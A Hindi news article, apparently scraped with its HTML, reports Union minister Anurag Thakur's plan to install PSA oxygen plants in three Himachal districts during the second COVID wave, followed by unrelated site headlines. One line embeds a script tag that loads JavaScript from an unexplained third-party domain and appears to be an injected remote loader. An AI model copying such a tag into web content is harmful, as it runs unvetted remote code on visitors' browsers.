<p>केंद्रीय वित्त एवं कॉरपोरेट अफ़ेयर्स राज्यमंत्री अनुराग ठाकुर ने कोरोना आपदा की गंभीरता को देखते हुए अपने व्यक्तिगत प्रयासों से हमीरपुर संसदीय क्षेत्र के तीनों ज़िलों ऊना, हमीरपुर और बिलासपुर में पीएफ़ए ऑक्सीजन प्लांट लगाने की जानकारी साझा की है। उन्होंने कहा कि कोरोना महामारी की दूसरी लहर ने विकराल रूप धारण कर लिया है ऐसे में हम सबकी सामूहिक ज़िम्मेदारी है कि खुद को सुरक्षित रखते हुए जिस किसी की जैसे जहां मदद हो सके उसके लिए ज़रूर आगे आएं।</p>
<p>इस समय देश के कई राज्य अत्यधिक विकट परिस्थितियों का सामना कोरोना की दूसरी लहर के कारण कर रहे हैं और इस बढ़ते संक्रमण के चलते पूरे देश में ऑक्सीजन की मांग भी बढ़ी है। सिर्फ़ मेरे हमीरपुर संसदीय क्षेत्र में यह मांग 60 गुना तक बढ़ गई है। यह वैश्विक आपदा है और हमें हर परिस्थिति से निपटने के लिए तैयार रहना होगा इसीलिए मैंने मेरे संसदीय क्षेत्र के तीन ज़िलों में पीएफ़ए ऑक्सीजन जेनरेशन प्लांट लगवाने का निर्णय लिया है।</p>
<p><img src=”/media/gallery/images/image(8874).jpeg” style=”height:695px; width:500px” /></p>
<p>आगे बोलते हुए अनुराग ठाकुर ने कहा कि ऊना में 500 एलपीएम और हमीरपुर बिलासपुर में 120-120 एलपीएम के ऑक्सीजन जेनरेशन प्लांट लगाने के लिए विशेषज्ञों की टीम ने तीनों ज़िलों के कोविड सेंटरों का सर्वेक्षण कार्य भी पूरा कर लिया है। वैसे तो डबल्यूएचओ टेक्नोलॉजी अप्रूव्ड इन प्लांटों को लगाने की समय सीमा न्यूनतम 4 महीने की है, लेकिन स्थिति की गंभीरता को देखते हुए यह कार्य रिकॉर्ड 20 दिनों के अंदर पूरा कर लिया जाएगा। पिछले हफ़्ते हमीरपुर और ऊना में कोविड उपचाराधीन मरीज़ों को ऑक्सीजन से जुड़ी कोई समस्या आए इस दिशा में 105 ऑक्सीजन सिलेंडर ज़िला प्रशासन को हैंडओवर किए गए। इन उपायों से हम 260 बेडों को सीधा ऑक्सीजन सप्लाई उपलब्ध कराने में सफल होंगे।</p>
<p>अनुराग ठाकुर ने कहा कि प्रधानमंत्री नरेंद्र मोदी भी देश में ऑक्सीजन की निरंतरता को बनाए रखने के लिए विदेशों से आयात होने वाले ऑक्सीजन प्लांट और मशीनरी पर जहां उत्पाद शुल्क और कस्टम ड्यूटी नहीं लगाने का फैसला किया तो वहीं उन्होंने पूरे देश में 551 ऑक्सीजन प्लांट स्थापित करने के लिए भी पैसा अलॉट किया। ज़रूरत मन्द लोगों को मेडिकल ऑक्सीजन की उपलब्धता और अधिक सूक्ष्म स्तर पर सुनिश्चित करने के लिए एक लाख ऑक्सीजन कंसंट्रेटर आयात करने का निर्णय लेकर कोविड की लड़ाई में देशवासियों के होंसला बढ़ाने का काम किया है, इसके लिए उनका आभारी हूं।</p>
<p><img src=”/media/gallery/images/image(2791).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
75th Constitution Day: जिला भाजपा हमीरपुर की उपाध्यक्ष उषा बिरला ने 75वें संविधान दिवस पर…
TCP Unauthorized Construction: हिमाचल प्रदेश के नगर एवं ग्राम नियोजन (टीसीपी) अधिनियम 1977 के तहत…
HRTC BOD Meeting : एचआरटीसी बीओडी की बैठक में हुए फैंसलों की जानकारी देने के…
Bajuri Panchayat Municipal Corporation Protest: हिमाचल प्रदेश के हमीरपुर जिले में नगर निगम बनाने के…
National Milk Day in Mandi: हिमाचल प्रदेश राज्य सहकारी दुग्ध उत्पादक प्रसंघ समिति की…
Mandi residents threaten election boycott: नगर निगम मंडी के बैहना वार्ड के लोगों ने नगर…